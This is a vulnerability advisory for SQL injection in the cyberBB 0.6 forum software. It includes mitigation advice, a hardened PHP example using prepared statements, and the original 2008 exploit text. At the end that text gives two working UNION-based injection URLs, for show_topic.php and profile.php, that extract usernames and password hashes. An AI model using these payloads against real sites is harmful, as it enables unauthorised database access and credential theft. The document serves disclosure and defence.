Vendor: cyberBB
By: cOndemned [ Dark-Coders ]
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: cyberBB
Affected Version From: 0.6
Affected Version To: 0.6
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

cyberBB v. 0.6 Multiple Remote SQL Injection Vulnerabilities

cyberBB v. 0.6 is vulnerable to multiple remote SQL injection vulnerabilities. The first is in the 'id' parameter of 'show_topic.php'; the second is in the 'user' parameter of 'profile.php'. Both vulnerabilities require the user to be logged in, and magic_quotes_gpc must be off. An attacker can exploit these vulnerabilities to read the database and extract sensitive information such as usernames and password hashes.

Mitigation:

Ensure that magic_quotes_gpc is enabled and that user input is validated and properly escaped or parameterized before it is used in SQL queries.
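Added example (not cyberBB's own code) showing the vulnerable pattern from show_topic.php beside a hardened equivalent that validates types and uses mysqli prepared statements; the `$mysql_*` configuration names come from the page, while the profile.php query shape and the column names `title`, `body` and `joined` are assumptions.

```php
<?php
// Added example, not cyberBB's code. $mysql_server/$mysql_user/$mysql_pass/$mysql_db
// are the config names used in the page; column names and the profile.php query are assumed.

// --- Vulnerable pattern (as in show_topic.php) ----------------------------------
// $id  = $_REQUEST['id'];
// $sql = "SELECT * FROM `topics` WHERE `id` = $id";  // unquoted, uncast: magic_quotes_gpc
//                                                     // cannot help a numeric context
// $sql = "SELECT * FROM `users` WHERE `username` = '$user'";  // assumed shape of profile.php

// --- Hardened ------------------------------------------------------------------
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$db = new mysqli($mysql_server, $mysql_user, $mysql_pass, $mysql_db);

/** Fetch one topic by id; anything that is not a positive integer is rejected. */
function fetch_topic(mysqli $db, $raw_id): ?array {
    // Type check happens before the value reaches SQL, so '-1 UNION ...' never gets there.
    $id = filter_var($raw_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT `id`, `title`, `body` FROM `topics` WHERE `id` = ?');
    $stmt->bind_param('i', $id);            // bound as an integer, never concatenated
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

/** Fetch a public profile by username; the value is bound, so quotes are data, not syntax. */
function fetch_profile(mysqli $db, string $user): ?array {
    if (!preg_match('/^[A-Za-z0-9_.-]{1,32}$/', $user)) {   // defence in depth: allow-list
        return null;
    }
    // Select only what the page needs; never SELECT * from a table that holds password hashes.
    $stmt = $db->prepare('SELECT `username`, `joined` FROM `users` WHERE `username` = ?');
    $stmt->bind_param('s', $user);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

$topic   = fetch_topic($db, $_REQUEST['id'] ?? '');
$profile = fetch_profile($db, (string)($_REQUEST['user'] ?? ''));
```

Parameter binding removes the injection regardless of the magic_quotes_gpc setting, which is the property the mitigation above is really after.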

Exploit-DB raw data:

########################################################################################
#
#   Name        :   cyberBB v. 0.6 Multiply Remote SQL Injection Vulnerabilities
#   Author      :   cOndemned [ Dark-Coders ]
#   Greetz      :   Avantura, str0ke, ZaBeaTy, voo|doo, irk4z, and many, many more...
#   Conditions  :   Magic quotes gpc = On & Off / User must be logged into 
#
########################################################################################

source of /show_topic.php :

    $id=$_REQUEST['id'];

    if(isset($_REQUEST['p'])) $p=$_REQUEST['p']; else $p='';

    $db = mysql_connect($mysql_server,$mysql_user,$mysql_pass);

    mysql_select_db($mysql_db);

    $sql = "SELECT * FROM `topics` WHERE `id` = $id";   // $id is interpolated unquoted and unvalidated


 proof of concept :
    
    /show_topic.php?id=-1+UNION+SELECT+1,2,3,4,concat(username,0x3a,password),6,7+FROM+users/*


second sql injection (magic quotes gpc must be off):
    
    /profile.php?user='-1+UNION+SELECT+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11+FROM+users/*

   
just 4 fun

# milw0rm.com [2008-08-18]